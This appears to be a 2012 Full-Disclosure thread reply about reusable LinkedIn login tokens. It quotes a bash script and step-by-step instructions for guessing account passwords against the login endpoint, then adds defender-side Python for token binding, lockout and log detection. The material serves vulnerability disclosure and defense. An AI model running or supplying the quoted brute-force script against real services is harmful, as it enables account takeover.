Date: Thu, 17 May 2012 20:50:53 +0300
From: Julius Kivimäki <julius.kivimaki@...il.com>
To: "Fernando A. Lagos B." <fernando@...ial.org>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: LinkedIn CSRF: Login Brute Force

Where's the CSRF? All I see here is a useless brute-force attack.

2012/5/17 Fernando A. Lagos B. <fernando@...ial.org>

> LinkedIn uses a token in the login form which can be used many times
> for different usernames. You can do it using the same IP or different
> IPs; the token will not be verified.
>
>
>
> I. Step by step
> ===============
> 1). Login into your LinkedIn account and capture the "sourceAlias" and
> "csrfToken" variable (example:
>
> sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)
>
> 2). Use the Token to login into another account:
>
> https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody@somedomain.com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless
>
> session_key is the username and session_password is the password.
>
> 3). The password (session_password) is not correct if the requested URL
> returns "The email address or password you provided does not match our
> records"; otherwise the password is correct.
>
>
>
> II. PoC
> =======
>
> 1). The Wordlist (filename: w)
> [zerial@...cebu ~]$ cat w
> asdfgh
> zxcvbnm
> 1234567
> 0987654
> 12345698
> 456_4567
> 123456qwert
> qwsdcv
> 12wedfgh
> 123456qwerty
> 12345qwei
> 112233
> [zerial@...cebu ~]$
>
>
> 2). Executing the script:
> [zerial@...cebu ~]$ sh linkedin.sh panic@...ial.org w
> Password found: qwsdcv
> [zerial@...cebu ~]$
>
> This is the correct password for this test user.
>
>
>
>
> III. Script
> ===========
>
> #!/bin/bash
> #
> # usage: ./linkedin.sh username@...ain.com wordlist
> #
>
> TOKEN="ajax%3A6265303044444817496"
> sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"
>
> if [ ! -f $2 ];
> then
>        echo "file $2 does not exist"
>        exit
> fi
>
> _USR=$1
> for _PWD in $(cat $2);
> do
>        if [ $(echo -n $_PWD|wc -c) -lt 6 ];
>        then
>                echo "Ignoring $_PWD (must be greater than 6 chars)";
>                continue
>        fi
>        wget -o /dev/null -O - "https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless" | grep 'The email address or password you provided does not match our records\|captcha' >>/dev/null
>        if [ $? -eq 1 ];
>        then
>                echo "Password found: $_PWD"; exit;
>        fi
> done
>
> echo "Password NOT found. Try later."
> #EOF
>
>
>
>
>
> More info (in Spanish):
>
> http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/
>
>
>
>
> cheers,
> --
> Fernando A. Lagos Berardi
> Seguridad Informatica
> GNU/Linux User #382319
> Blog: http://blog.zerial.org
> Jabber: zerial@...beres.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


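The disagreement in this thread is about what the finding actually is: the posted script works not because of a forgery weakness but because the login endpoint accepts one form token for any account, from any client, with no limit on failed attempts. The Python below is an added illustration from a defender's side and is not code from either poster or from LinkedIn. It models the two controls that remove the problem (a token bound to the issuing session and rotated after use, plus per-account throttling of failed logins) and a small detector that runs over access-log lines to spot the pattern the script would produce. LoginService, flag_guessing, MAX_FAILURES, the 401/302 status convention and the log lines are all constructed for this example.

```python
"""
Defender-side model of the weakness discussed in the thread (constructed for
this example; not LinkedIn's code and not either poster's script).

The posted script works because the login endpoint accepts one form token for
any account, from any client, without limit. Two controls are modelled:
  1. LoginService: the token is bound to the session that received it, is
     consumed on each use, and failed attempts are throttled per account.
  2. flag_guessing(): a detector over constructed access-log lines that flags
     one token replayed against many accounts and one account collecting many
     rejected logins.
"""
import hmac
import secrets
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

MAX_FAILURES = 5  # assumed per-account lockout threshold for this example


class LoginService:
    """Toy login endpoint. `users` maps username to password (demo only; a
    real service stores password hashes, not passwords)."""

    def __init__(self, users):
        self._users = users
        self._tokens = {}                   # session_id -> token issued to it
        self._failures = defaultdict(int)   # username -> consecutive failures

    def issue_token(self, session_id):
        """A fresh token per session; presenting it from another session fails
        even though the value itself is valid somewhere."""
        token = secrets.token_urlsafe(16)
        self._tokens[session_id] = token
        return token

    def login(self, session_id, token, username, password):
        # Single use: the session's token is consumed by every attempt, so a
        # captured value cannot be replayed, and a token that was never issued
        # to this session is rejected outright.
        expected = self._tokens.pop(session_id, None)
        if expected is None or not hmac.compare_digest(expected.encode(), token.encode()):
            return "invalid_token"
        if self._failures[username] >= MAX_FAILURES:
            return "locked"   # no password oracle once the account is locked
        stored = self._users.get(username, "")
        if not hmac.compare_digest(stored.encode(), password.encode()):
            self._failures[username] += 1
            return "bad_credentials"
        self._failures[username] = 0
        return "ok"


# Constructed access-log lines: '<client ip> "<request line>" <status>'. In
# this sample 401 means the login was rejected and 302 means it succeeded; the
# password parameter is left out because a log should never record it.
SAMPLE_LOG = [
    '203.0.113.5 "GET /uas/login-submit?csrfToken=ajax%3AT1&session_key=a%40example.com HTTP/1.1" 401',
    '203.0.113.5 "GET /uas/login-submit?csrfToken=ajax%3AT1&session_key=b%40example.com HTTP/1.1" 401',
    '198.51.100.9 "GET /uas/login-submit?csrfToken=ajax%3AT1&session_key=c%40example.com HTTP/1.1" 401',
    '198.51.100.9 "GET /uas/login-submit?csrfToken=ajax%3AT1&session_key=d%40example.com HTTP/1.1" 401',
] + [
    '203.0.113.7 "GET /uas/login-submit?csrfToken=ajax%3AT2&session_key=e%40example.com HTTP/1.1" 401'
    for _ in range(6)
] + [
    '192.0.2.3 "GET /uas/login-submit?csrfToken=ajax%3AT3&session_key=f%40example.com HTTP/1.1" 302',
]


def flag_guessing(log_lines, max_accounts_per_token=3, max_failures_per_account=5):
    """Return (tokens, accounts): tokens seen with more than
    max_accounts_per_token distinct session_key values, and accounts with more
    than max_failures_per_account rejected logins. Both lists are sorted."""
    accounts_by_token = defaultdict(set)
    failures_by_account = defaultdict(int)
    for line in log_lines:
        _, request, status = line.split('"')
        path = request.split()[1]
        query = parse_qs(urlsplit(path).query)
        token = query.get("csrfToken", [""])[0]
        user = query.get("session_key", [""])[0]
        if not token or not user:
            continue
        accounts_by_token[token].add(user)
        if int(status) != 302:
            failures_by_account[user] += 1
    tokens = sorted(t for t, u in accounts_by_token.items() if len(u) > max_accounts_per_token)
    accounts = sorted(u for u, n in failures_by_account.items() if n > max_failures_per_account)
    return tokens, accounts


if __name__ == "__main__":
    svc = LoginService({"alice@example.com": "correct horse"})
    tok = svc.issue_token("s1")
    print(svc.login("s2", tok, "alice@example.com", "correct horse"))  # invalid_token
    print(svc.login("s1", tok, "alice@example.com", "wrong"))          # bad_credentials
    print(flag_guessing(SAMPLE_LOG))  # (['ajax:T1'], ['e@example.com'])
```

The detector deliberately keys on two different things: a token value shared across many accounts catches the reuse the post describes, while a failure count per account catches plain guessing even after tokens are fixed; the 5-attempt lockout in LoginService is a placeholder threshold, and a production service would pair it with a time window so the lock expires.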
